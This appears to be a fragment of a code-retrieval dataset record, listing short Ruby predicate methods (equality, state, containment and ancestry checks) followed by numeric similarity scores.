"def ==(x)\n return false unless x.kind_of?(Element)\n return true if x.object_id == object_id\n return false unless x.tagname_symbol == @tagname\n return false unless x.attrs.size == @attrs.size\n @attrs.each do |a|\n return false unless x[a.key] == a.value\n end\n return false unless x.body == @body\n true\n end",
"def matches_state_attrs?\n @expected_attrs == state_attrs\n end",
"def match?\n source_repo_match? && @build.master_branch?\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def contains?(x, y)\n self_area = triangle_area(@x1, @y1, @x2, @y2, @x3, @y3)\n questioned_area =\n triangle_area(@x1, @y1, @x2, @y2, x, y) +\n triangle_area(@x2, @y2, @x3, @y3, x, y) +\n triangle_area(@x3, @y3, @x1, @y1, x, y)\n\n questioned_area <= self_area\n end",
"def contains?(x, y)\n self_area = triangle_area(@x1, @y1, @x2, @y2, @x3, @y3)\n questioned_area =\n triangle_area(@x1, @y1, @x2, @y2, x, y) +\n triangle_area(@x2, @y2, @x3, @y3, x, y) +\n triangle_area(@x3, @y3, @x1, @y1, x, y)\n\n questioned_area <= self_area\n end",
"def part_of_left_x?(x, y)\n x == y\n end",
"def matches? actual\n super\n\n true === actual || false === actual\n end",
"def x_of_a_kind?(x, c)\n c.group_by(&:value).map { |value, grouping| grouping.count >= x }.any?\n end",
"def child_of?(parent); end",
"def current_stack_match?\n parent_stack = @stack[0..-2]\n\n return false unless dom_stubs[@stack].at_xpath(@xpath)\n\n parent_stack.empty? || !dom_stubs[parent_stack].at_xpath(@xpath)\n end",
"def in?(x, y)\n check_x = x.between?(@x, @x+@width)\n check_y = y.between?(@y, @y+@height)\n check_x && check_y\n end",
"def matches?(klass)\n matching_ancestors.any? { |ancestor| klass <= ancestor }\n end",
"def active?\n @state.active?\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def accept_state?(state)\n @accept.include? state\n end",
"def end_state?\n not player_alive?(Player1) or not player_alive?(Player2)\n end",
"def in_workflow_state?(test_states = [])\n return false unless state && !test_states.blank?\n\n test_state_regex = test_states.join('|').gsub(/\\s+/, '.+')\n !/#{test_state_regex}/.match(state).nil?\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def matches?\n # Can't match again if we're inside a match already:\n return false if @matched_depth\n\n match = current_stack_match?\n\n # \"empty element\" matches are yielded immediately, without\n # tagging the stack as having matched, because there won't\n # be an equivalent closing tag to end the match with later.\n if in_empty_element?\n @stack.pop\n elsif match\n @match_depth = @stack.length\n end\n\n match\n end",
"def match?(left, right)\n match(left, right) >= IdentityParade.config.match_score\n end",
"def member?(user)\n user.member?(self)\n end",
"def active?(submodule_name)\n active.select { |s| s[:name].to_s == submodule_name.to_s }.any?\n end",
"def ==(x)\n return true if object_id == x.object_id\n return false unless x.kind_of?(AttrArray)\n each_with_index do |a, n|\n return false unless a == x[n]\n end\n true\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def ==(state)\n @buckets == state.buckets &&\n @actions == state.actions &&\n @goal == state.goal\n end",
"def intersects?(subnet)\n includes? subnet.first or includes? subnet.last\n end",
"def operand_matches?(value)\n operand.matches?(value)\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def contains?(target)\n return false if kind == 'state' && target.kind == 'country'\n return false if kind == 'zipcode' && ['country', 'state'].include?(target.kind)\n return false if zone_members.empty? || target.zone_members.empty?\n\n if kind == target.kind\n target.zoneables.each do |target_zoneable|\n return false unless zoneables.include?(target_zoneable)\n end\n elsif target.kind == 'zipcode'\n target.zoneables.each do |target_zip|\n # zips contained in states\n if kind == 'state'\n return false unless zoneables.include?(target_zip.state)\n # zips contained in countries\n elsif kind == 'country'\n return false unless zoneables.include?(target_zip.state.try(:country))\n end\n end\n elsif\n # states contained in countries\n target.zoneables.each do |target_state|\n return false unless zoneables.include?(target_state.country)\n end\n end\n true\nend",
"def member_of?(entity)\n\t\tassociation_exists?(entity, \"membership\", \"joinable\", \"joined\")\n\tend",
"def kind_of?(thing)\n ancestors.include? thing\n end",
"def collide_with_vehicles?(x, y)\r\r\n $game_map.boat.pos_rect_nt?(x, y, collision_rect) || $game_map.ship.pos_rect_nt?(x, y, collision_rect)\r\r\n end",
"def has_conjunction?\n\t\treturn self.num_sublinkages > 1\n\tend"
] |
[
"0.7849539",
"0.69354314",
"0.62772065",
"0.58552575",
"0.5783112",
"0.57808584",
"0.5702207",
"0.5694464",
"0.567237",
"0.5665709",
"0.5665709",
"0.5652542",
"0.56418973",
"0.5599023",
"0.55965835",
"0.5564319",
"0.55438274",
"0.5501651",
"0.54580486",
"0.54479164",
"0.54479164",
"0.54479164",
"0.5444238",
"0.5397645",
"0.53719443",
"0.5367607",
"0.53625196",
"0.5359978",
"0.53519547",
"0.5341296",
"0.5328701",
"0.5319951",
"0.5283515",
"0.5279188",
"0.5268128",
"0.5268128",
"0.5268128",
"0.5247353",
"0.5234869",
"0.52283037",
"0.522453",
"0.5219461",
"0.5219461",
"0.5219461",
"0.5200091",
"0.51886517",
"0.51871586",
"0.5185283",
"0.5177908",
"0.5174361",
"0.5171313",
"0.5167491",
"0.5163009",
"0.5158803",
"0.51557106",
"0.5155424",
"0.5154224",
"0.51391816",
"0.5130363",
"0.51209164",
"0.5119734",
"0.51159525",
"0.5113218",
"0.5102592",
"0.5096077",
"0.5094459",
"0.5093954",
"0.5093954",
"0.50902635",
"0.50849456",
"0.50692236",
"0.50554043",
"0.5054489",
"0.5048936",
"0.50352657",
"0.50348735",
"0.50308585",
"0.50306207",
"0.5024812",
"0.50178415",
"0.5009644",
"0.5006978",
"0.5005169",
"0.49964955",
"0.49877784",
"0.49764118",
"0.49744502",
"0.497211",
"0.49712205",
"0.49707434",
"0.49704254",
"0.49681872",
"0.49633577",
"0.49578413",
"0.49484852",
"0.4944946",
"0.49431446",
"0.49411285",
"0.49389848",
"0.493678"
] |
0.740121
|
1
|
Returns true if this State is a substate of x. All States are substates of themselves.
|
def is_a_substate_of? x
self.ancestors.include?(x)
end
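Reusing the hypothetical SketchState from the sketch above: the relation is reflexive by construction, because ancestors always begins with self.

root = SketchState.new(:root)
leaf = SketchState.new(:leaf, root)

leaf.is_a_substate_of?(leaf) # => true  (every state is a substate of itself)
leaf.is_a_substate_of?(root) # => true
root.is_a_substate_of?(leaf) # => false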
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_superstate_of? x\n x.ancestors.include?(self)\n end",
"def === x\n # $stderr.puts \"#{self.inspect} === #{x.inspect}\"\n case x\n when self.class\n self.is_a_substate_of?(x)\n else\n super\n end\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def is_sub?\n @sub\n end",
"def sub_branch?\n !root?\n end",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def sub? name\n @subs.include? name\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def selected_by_subnav?\n sub_navigation && sub_navigation.selected?\n end",
"def matches_ancestors?(ancestors); end",
"def selected_sub_catgeory?\r\n !session[:selected_sub_catgeory].nil?\r\n end",
"def child_of?(parent); end",
"def has_state?\n !@states.empty?\n end",
"def intersects?(subnet)\n includes? subnet.first or includes? subnet.last\n end",
"def subclients?\n subclients.any?\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def subconfig? key\n @schema.subconfig? key\n end",
"def subconfig? key\n @validators[String(key).to_sym] == SUBCONFIG\n end",
"def has_conjunction?\n\t\treturn self.num_sublinkages > 1\n\tend",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def state?(state)\n @state == state\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def super_and_sub?(sup, sub); end",
"def state?(state)\n @_state == state\n end",
"def ancestors?\n read_attribute(self.ancestry_base_class.ancestry_column).present?\n end",
"def ==(x)\n if !x.is_a?(self.class)\n false\n else\n if empty?\n x.empty?\n else\n !x.empty? && head == x.head && tail == x.tail\n end\n end\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state?(state)\n @states.key?(state)\n end",
"def child_of?(residue)\n residue.residue_composition.include?(self)\n end",
"def subfolders?\n !self.subfolders.nil?\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def sibling_of?(node)\n self.read_attribute(self.ancestry_base_class.ancestry_column) == node.read_attribute(self.ancestry_base_class.ancestry_column)\n end",
"def nested?\n !!state_or_event\n end",
"def has_subnet?(subnet_id_symbol)\n @subnet_ids.key?(subnet_id_symbol)\n end",
"def subdomain_of?(other)\n raise ArgumentError, \"not a domain name: #{other.inspect}\" unless Name === other\n return false if @absolute != other.absolute?\n other_len = other.length\n return false if @labels.length <= other_len\n return @labels[-other_len, other_len] == other.to_a\n end",
"def has_children?\n ( self[:has_children] == 1 )\n end",
"def has_subdomain?(subdomain)\n owned_subdomains.include?(subdomain)\n end",
"def has_submodel?(model)\n each_submodel.any? { |m| m == model }\n end",
"def is_a_subdomain?\n subdomain?\n end",
"def is_subpart?\n case @raw_provider['organization_subpart']\n when 'yes'\n true\n when 'no'\n false\n else\n nil\n end\n end",
"def is_superselector(sup, sub)\n sup = parse_selector(sup, :super)\n sub = parse_selector(sub, :sub)\n bool(sup.superselector?(sub))\n end",
"def contains_subarray?(source, subarray)\n source = Array.wrap(source)\n subarray = Array.wrap(subarray)\n iteration_count = source.length - subarray.length\n 0.upto(iteration_count).any? do |i|\n source[i..(i+subarray.length-1)] == subarray\n end\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def has_children?\n self.children.any?\n end",
"def whole_reg?\n size == parent.size\n end",
"def svn?\n is_a?(Subversion) # :-)\n end",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def leaf?(sexp)\n list?(sexp) && depth(sexp) == 1\nend",
"def is_subsequence(s, t)\n t_id = 0\n s_id = 0\n while t_id < t.length && s_id < s.length\n s_id += 1 if t[t_id] == s[s_id]\n t_id += 1\n end\n s_id == s.length\nend",
"def kind_of?(thing)\n ancestors.include? thing\n end",
"def superselector?(seq)\n _superselector?(members, seq.members)\n end",
"def sane_ancestry?\n ancestry.nil? || (ancestry.to_s =~ Ancestry::ANCESTRY_PATTERN && !ancestor_ids.include?(self.id)) \n end",
"def superbalanced?(root)\n terminating_levels = []\n\n nodes_to_check = []\n\n nodes_to_check << [root, 0]\n\n until nodes_to_check.empty?\n current_node, current_level = nodes_to_check[0].first, nodes_to_check.shift.last\n\n if current_node.left || current_node.right\n nodes_to_check << [current_node.left, current_level + 1] if current_node.left\n nodes_to_check << [current_node.right, current_level + 1] if current_node.right\n else\n # if we have found a terminating node, then we must check certain things:\n # if the terminating levels already has 2 elements and\n # this terminating node's current level is distinct, then we short circuit and return false\n # else just continue\n # check whether the current level and the element inside has difference greater than 1\n # if yes, then short circuit and return false\n # else, shovel the current level in and continue\n\n if terminating_levels.length == 2\n return false if !terminating_levels.include?(current_level)\n else\n return false if terminating_levels.length == 1 && !(terminating_levels.first - current_level).between?(-1, 1)\n terminating_levels << current_level if terminating_levels.first != current_level\n end\n end\n end\n\n true\nend",
"def sub_menu?\n items && (items.empty? ? false : true)\n end",
"def subTagOf?(iOtherTag)\n rFound = false\n\n lCheckTag = @Parent\n while (lCheckTag != nil)\n if (lCheckTag == iOtherTag)\n rFound = true\n break\n end\n lCheckTag = lCheckTag.Parent\n end\n\n return rFound\n end",
"def in_subform?(column, parent_record)\r\n return true unless column.association\r\n\r\n # Polymorphic associations can't appear because they *might* be the reverse association, and because you generally don't assign an association from the polymorphic side ... I think.\r\n return false if column.polymorphic_association?\r\n\r\n # We don't have the UI to currently handle habtm in subforms\r\n return false if column.association.macro == :has_and_belongs_to_many\r\n\r\n # A column shouldn't be in the subform if it's the reverse association to the parent\r\n return false if column.association.reverse_for?(parent_record.class)\r\n #return false if column.association.klass == parent_record.class\r\n\r\n return true\r\n end",
"def subnets?\n get_subnet_or_subnets\n end",
"def in_subform?(column, parent_record, parent_column)\n return true unless column.association\n\n if column.association.reverse.nil?\n # Polymorphic associations can't appear because they *might* be the reverse association\n return false if column.association.polymorphic?\n\n # A column shouldn't be in the subform if it's the reverse association to the parent\n !column.association.inverse_for?(parent_record.class)\n elsif column.association.reverse == parent_column.name\n if column.association.polymorphic?\n column.association.name != parent_column.association.as\n else\n !column.association.inverse_for?(parent_record.class)\n end\n else\n true\n end\n end",
"def isComposite\n ! ! @submachine\n end",
"def binary?\n ancestors.include?(Operator::Binary)\n end",
"def can_subsample?\n if self.points < SUBSAMPLE_THRESHOLDS.min || self.subsampled\n false\n else\n # check if there are any data arrays belonging to this cluster that have a subsample threshold & annotation\n !self.find_subsampled_data_arrays.any?\n end\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?\n !!current_state\n end",
"def is_child_of?(_parent)\n return false if (self == _parent) or self.root?\n _parent == self.parent\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def contained?(other); end",
"def contained?(other); end",
"def contained?(other); end",
"def is_or_is_ancestor_of?(other)\n other == self || is_ancestor_of?(other)\n end",
"def could_be_subsecond?(subsecond); end",
"def child_of?(parent)\n self.class.child?(type, parent)\n end",
"def has_child?\n !@children.empty?\n end",
"def has_children?\n !leaf?\n end",
"def is_child?\n !is_parent?\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_children?\n !self.children.empty?\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def handle_subelement?(object, sub_feature_key)\n true\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def children?\n self.children.any?\n end",
"def has_ancestor_taxon_id( ancestor_id )\n return true if id == ancestor_id\n return false if ancestry.blank?\n\n !!ancestry.match( %r{(^|/)#{ancestor_id}(/|$)} )\n end",
"def active?(submodule_name)\n active.select { |s| s[:name].to_s == submodule_name.to_s }.any?\n end",
"def matches_ancestors?(ancestors)\n (ancestors & matching_ancestors).any?\n end",
"def enemy_has_state?(id, s_id)\n # get enemies\n enemies = get_enemies(id)\n # return result\n return (enemies.any? {|e| e.states.include?(s_id)})\n end",
"def running?\n @child && @child.running?\n end",
"def is_subtree(root, sub_root)\n subroot_traversal = recursive_inorder_traversal(sub_root)\n\n is_subtree_recursive(root, subroot_traversal)[0]\nend",
"def superselector?(cseq)\n cseq.members.all? {|seq1| members.any? {|seq2| seq2.superselector?(seq1)}}\n end",
"def has_children?\n self.children.size > 0\n end",
"def has_children?\n self.children.size > 0\n end",
"def has_children?\n self.children.size > 0\n end"
] |
[
"0.7557768",
"0.70673037",
"0.6455087",
"0.5892427",
"0.5886137",
"0.57861155",
"0.5657961",
"0.5624698",
"0.5515374",
"0.54992735",
"0.54143417",
"0.5406614",
"0.53588253",
"0.5335014",
"0.5286561",
"0.52826935",
"0.52713877",
"0.52675635",
"0.5247119",
"0.52331185",
"0.5232019",
"0.52235836",
"0.522025",
"0.5218496",
"0.5212086",
"0.520609",
"0.51651764",
"0.5163283",
"0.5161517",
"0.5160318",
"0.5141057",
"0.51395446",
"0.5129441",
"0.5124942",
"0.5115346",
"0.5110814",
"0.5107705",
"0.50908643",
"0.50790244",
"0.50760096",
"0.5056381",
"0.505107",
"0.5040794",
"0.50358826",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.50321364",
"0.5030243",
"0.500538",
"0.50011796",
"0.49938372",
"0.49902466",
"0.49745598",
"0.49691513",
"0.49666786",
"0.49661088",
"0.49523064",
"0.49501556",
"0.49494645",
"0.4946251",
"0.49443477",
"0.4937216",
"0.4935386",
"0.4932227",
"0.4931202",
"0.4931202",
"0.49280164",
"0.49267375",
"0.49211302",
"0.49106696",
"0.49106696",
"0.49106696",
"0.49085468",
"0.4902627",
"0.49012798",
"0.48954463",
"0.48953807",
"0.4893212",
"0.48896202",
"0.4886416",
"0.48849243",
"0.4878733",
"0.48778558",
"0.4876078",
"0.48753482",
"0.48742172",
"0.48719656",
"0.48687932",
"0.4866657",
"0.48659262",
"0.48657724",
"0.48581696",
"0.48581696",
"0.48581696"
] |
0.8677874
|
0
|
Returns true if this State is a superstate of x. All States are superstates of themselves.
|
def is_a_superstate_of? x
x.ancestors.include?(self)
end
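This is the mirror image of the substate check: it walks x's ancestor chain instead of self's. Continuing the hypothetical SketchState sketch (reopening the class to add the method):

class SketchState
  def is_a_superstate_of?(x)
    x.ancestors.include?(self)
  end
end

root.is_a_superstate_of?(leaf) # => true  (inverse of leaf.is_a_substate_of?(root))
leaf.is_a_superstate_of?(root) # => false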
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def === x\n # $stderr.puts \"#{self.inspect} === #{x.inspect}\"\n case x\n when self.class\n self.is_a_substate_of?(x)\n else\n super\n end\n end",
"def super_and_sub?(sup, sub); end",
"def is_superselector(sup, sub)\n sup = parse_selector(sup, :super)\n sub = parse_selector(sub, :sub)\n bool(sup.superselector?(sub))\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def is_super?\n state = false\n roles.each do |role|\n state = true if role.name.eql?(ENV['SUPER_N'] || ENV['SUPER_C']) && user_roles.find_by(role_id: role.id, active: true)\n end\n state\n end",
"def super?\n logged_in? && current_user.super\n end",
"def unary?\n ancestors.include?(Operator::Unary)\n end",
"def is_superuser?\n superuser? && supermode?\n end",
"def superset?(other_set)\n requires_set(other_set, __method__)\n other_set.subset?(self)\n end",
"def super?\n group_name == 'super'\n end",
"def ancestors?\n read_attribute(self.ancestry_base_class.ancestry_column).present?\n end",
"def superset?(set)\n self.all? { |val| set.include?(val) }\n end",
"def sub_branch?\n !root?\n end",
"def proper_superset?(set)\n return self != set && superset?(set) if set.is_a?(IntegerSet)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size <= set.size\n set.all? { |o| include?(o) }\n end",
"def is_supervisor?\n not under_supervision_clinics.empty?\n end",
"def proper_superset?(set)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size <= set.size\n set.all? { |o| include?(o) }\n end",
"def <= (t)\n self == t || t.is_super_of?(self)\n end",
"def superset?(superset_path: superset_path, set_path: set_path)\n if set_path.empty?\n true\n else\n if superset_path.empty?\n false\n else\n if superset_path.first_name == set_path.first_name\n partitions_of_subset(superset_path.first_name).superset?(superset_path: superset_path.rest_names, set_path: set_path.rest_names)\n else\n false\n end\n end\n end\n end",
"def is_superior_to?(product)\n if product && product.is_subscription? && self.is_subscription?\n if self.is_flat? && product.is_flat?\n return false\n elsif self.is_flat? && !product.is_flat?\n return true\n elsif self.contacts.to_i != 0 && product.is_flat?\n return false\n elsif self.contacts.to_i > product.contacts.to_i\n return true\n end\n elsif self.is_subscription? && product.nil?\n return true\n end\n false\n end",
"def superset?(set)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size < set.size\n set.all? { |o| include?(o) }\n end",
"def average_roles_has_super_user?\n return self.roles_as(:identifiers).include?(AverageRoles.configuration.super_user) unless AverageRoles.configuration.super_user == nil\n return false\n end",
"def is_superuser?(*args)\n\t\t\tself.role_names.include?('superuser')\n\t\tend",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def starts_with? x\r\n self[0..x.size-1] == x\r\n end",
"def sister?(node)\n self.parent == node.parent &&\n node.sister == self\n end",
"def superselector?(seq)\n _superselector?(members, seq.members)\n end",
"def valid?\n return false if !super\n true\n end",
"def superuser?\n member_of_group?(\"Superusers\")\n end",
"def superselector?(cseq)\n cseq.members.all? {|seq1| members.any? {|seq2| seq2.superselector?(seq1)}}\n end",
"def matches_ancestors?(ancestors); end",
"def superset_of?( other_collection )\n other.all? {|e| self.include? e }\n end",
"def is_superuser?(*args)\n\t\tself.role_names.include?('superuser')\n\tend",
"def authorized_to_act_as_superuser?\n member_of? Ddr::Auth.superuser_group\n end",
"def include?(x)\n inf <= x && x <= sup\n end",
"def is_or_is_ancestor_of?(other)\n other == self || is_ancestor_of?(other)\n end",
"def subsume?(other)\n range_within_other?(other,self)\n end",
"def superset?(set)\n case\n when set.instance_of?(self.class) && @hash.respond_to?(:>=)\n @hash >= set.instance_variable_get(:@hash)\n when set.is_a?(Set)\n size >= set.size && set.all? { |o| include?(o) }\n else\n raise ArgumentError, \"value must be a set\"\n end\n end",
"def is_or_is_ancestor_of?(other)\n (other == self) or is_ancestor_of?(other)\n end",
"def has_state?\n !@states.empty?\n end",
"def superbalanced?(root)\n terminating_levels = []\n\n nodes_to_check = []\n\n nodes_to_check << [root, 0]\n\n until nodes_to_check.empty?\n current_node, current_level = nodes_to_check[0].first, nodes_to_check.shift.last\n\n if current_node.left || current_node.right\n nodes_to_check << [current_node.left, current_level + 1] if current_node.left\n nodes_to_check << [current_node.right, current_level + 1] if current_node.right\n else\n # if we have found a terminating node, then we must check certain things:\n # if the terminating levels already has 2 elements and\n # this terminating node's current level is distinct, then we short circuit and return false\n # else just continue\n # check whether the current level and the element inside has difference greater than 1\n # if yes, then short circuit and return false\n # else, shovel the current level in and continue\n\n if terminating_levels.length == 2\n return false if !terminating_levels.include?(current_level)\n else\n return false if terminating_levels.length == 1 && !(terminating_levels.first - current_level).between?(-1, 1)\n terminating_levels << current_level if terminating_levels.first != current_level\n end\n end\n end\n\n true\nend",
"def contains_x?(x)\n\t\t(self.left..self.right).include?(x);\n\tend",
"def superset?(set)\n return (~@val & set.to_i) == 0 if set.is_a?(IntegerSet)\n set.is_a?(Set) or raise ArgumentError, \"value must be a set\"\n return false if size < set.size\n set.all? { |o| include?(o) }\n end",
"def has_state?\n !!current_state\n end",
"def state?(state)\n @_state == state\n end",
"def is_sub?\n @sub\n end",
"def start_state?\n @state_type == :start\n end",
"def invalid_superset?\n invalid = false\n self.traverse do |key_path, value|\n expected = schema.ref(key_path)\n invalid = invalid || !expected\n end\n invalid\n end",
"def is_parent_or_future_instance?\n return !self.over? || self.is_parent?\n end",
"def ancestors\n @ancestors ||=\n begin\n x = [ self ]\n if ss = superstate\n x.push(*ss.ancestors)\n end\n NamedArray.new(x.freeze, :state)\n end\n end",
"def proper_superset?(set)\n case\n when set.instance_of?(self.class) && @hash.respond_to?(:>)\n @hash > set.instance_variable_get(:@hash)\n when set.is_a?(Set)\n size > set.size && set.all? { |o| include?(o) }\n else\n raise ArgumentError, \"value must be a set\"\n end\n end",
"def sibling_of?(node)\n self.read_attribute(self.ancestry_base_class.ancestry_column) == node.read_attribute(self.ancestry_base_class.ancestry_column)\n end",
"def state?(state)\n @state == state\n end",
"def is_super_admin?\n ((!user_group_id.nil?) && has_permission(:is_super_admin))\n end",
"def whole_reg?\n size == parent.size\n end",
"def xa?\n self.state == :xa\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def child_of?(parent); end",
"def superShiny?\n return self.superHue.is_a?(Numeric) ? true : false\n end",
"def superShiny?\n return self.superHue.is_a?(Numeric) ? true : false\n end",
"def final_situation?(sit)\n (super(sit) and sit.stack.empty?) ? true : false\n end",
"def super_user? \n current_user.role.role == \"Super\" \n end",
"def top_level?\n top_level == self\n end",
"def non_relational?\n ancestors.include?(NonRelational)\n end",
"def teacher_is_super( teacher)\n teacher == Teacher.first\n end",
"def is_super_user?\n @super_user\n end",
"def base?\n if self.base != nil\n true\n else\n false\n end\n end",
"def superuser?\n env && env.key?(\"warden\") && env[\"warden\"].authenticate?(scope: :superuser)\n end",
"def state?(state)\n @states.key?(state)\n end",
"def toplevel?\n if Collection.check # When usign multi-species databases\n return true if self == CoordSystem.find_by_rank_and_species_id(1,self.species_id)\n else\n return true if self == CoordSystem.find_by_rank(1) \n end\n return false\n end",
"def super_user?\n super_user\n end",
"def superShiny?\n return self.pokemon && self.pokemon.superShiny?\n end",
"def superior_to?(folder)\n @location.superior_to?(folder.location)\n end",
"def is_base?\n base_quantities.size == 1 &&\n @base_quantity_hash[base_quantities.first] == 1 ? true : false\n end",
"def base_class?\n base_class == self\n end",
"def enotsup?() super; end",
"def is_first_segment_of_flight?\n return true if sibling_segments.empty?\n sibling_segments.sort_by {|segment| segment.index }.first == self\n end",
"def lowest_level?\n !children.any? {|child| child.kind_of?(NonLeafNode)}\n end",
"def binary?\n ancestors.include?(Operator::Binary)\n end",
"def degenerate?\n inf == sup\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def is_ancestor_of?(other)\n other[tree_path_field].include?(self._id)\n end",
"def relational?\n ancestors.include?(Relational)\n end",
"def has_siblings?\n return call_ancestry_method(:has_siblings?) if use_ancestry?\n\n relationships.any?(&:has_siblings?)\n end",
"def sane_ancestry?\n ancestry.nil? || (ancestry.to_s =~ Ancestry::ANCESTRY_PATTERN && !ancestor_ids.include?(self.id)) \n end",
"def is_or_is_sibling_of?(other)\n (other == self) or is_sibling_of?(other)\n end",
"def steady_state?(state)\n STATES[state] >= STEADY_STATE_THRESHOLD\n end",
"def species_or_lower?\n return false if rank_level.blank?\n\n rank_level <= SPECIES_LEVEL\n end",
"def is_child?\n !is_parent?\n end",
"def backwards?\n remote == ancestor\n end",
"def active_ship?(ship_obj)\n @active_pos.has_value?(ship_obj)\n end",
"def is_current_super_admin?\n if current_admin \n if current_admin.super_admin?\n return true\n else \n return false\n end \n else \n return false\n end \n end",
"def svn?\n is_a?(Subversion) # :-)\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def superadmin?\n current_user.has_role? :superadmin\n end",
"def active?\n @state.active?\n end",
"def root?\n !parent\n end",
"def terminal_state?\n self.class.terminal_states.include?(@state)\n end",
"def has_state?(v)\n @state[v]\n end"
] |
[
"0.77484745",
"0.708355",
"0.5812886",
"0.56504595",
"0.5633534",
"0.53952336",
"0.537603",
"0.52856153",
"0.52422816",
"0.5228173",
"0.5222996",
"0.52215654",
"0.52214503",
"0.52096343",
"0.5181934",
"0.5152315",
"0.5145117",
"0.51106036",
"0.5055891",
"0.5050865",
"0.5044035",
"0.5028964",
"0.50108004",
"0.50001854",
"0.4989434",
"0.49882555",
"0.49711344",
"0.49667192",
"0.4960488",
"0.4958683",
"0.49459916",
"0.49406853",
"0.49352092",
"0.491942",
"0.49016428",
"0.48815465",
"0.48797515",
"0.4877321",
"0.487261",
"0.48722515",
"0.486008",
"0.48535976",
"0.4834359",
"0.48319545",
"0.48274732",
"0.481934",
"0.481544",
"0.4814802",
"0.48043045",
"0.48026046",
"0.47995523",
"0.4795034",
"0.47867784",
"0.47766724",
"0.4761044",
"0.47518256",
"0.47494712",
"0.47482276",
"0.4748086",
"0.4748086",
"0.4734511",
"0.47282907",
"0.4722288",
"0.47195786",
"0.47177953",
"0.47146335",
"0.47006482",
"0.4700507",
"0.46786627",
"0.46720633",
"0.46625566",
"0.46541405",
"0.46539974",
"0.4652723",
"0.4647001",
"0.46368805",
"0.4635508",
"0.46340263",
"0.46254924",
"0.46182588",
"0.4616567",
"0.46048075",
"0.4595763",
"0.4592187",
"0.45917758",
"0.45892197",
"0.4586389",
"0.4581196",
"0.4577302",
"0.455982",
"0.4551886",
"0.45500132",
"0.45396784",
"0.45221958",
"0.4521462",
"0.45191935",
"0.45172977",
"0.45132604",
"0.45081443",
"0.4493223"
] |
0.82940197
|
0
|
A state with isComposite=true is said to be a composite state. A composite state is a state that contains at least one region. Default value is false.
|
def isComposite
! ! @submachine
end
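A minimal sketch of the UML notion above, assuming (as the code does) that a state counts as composite exactly when it carries a submachine; UmlState is a hypothetical name:

class UmlState
  def initialize(submachine = nil)
    @submachine = submachine
  end

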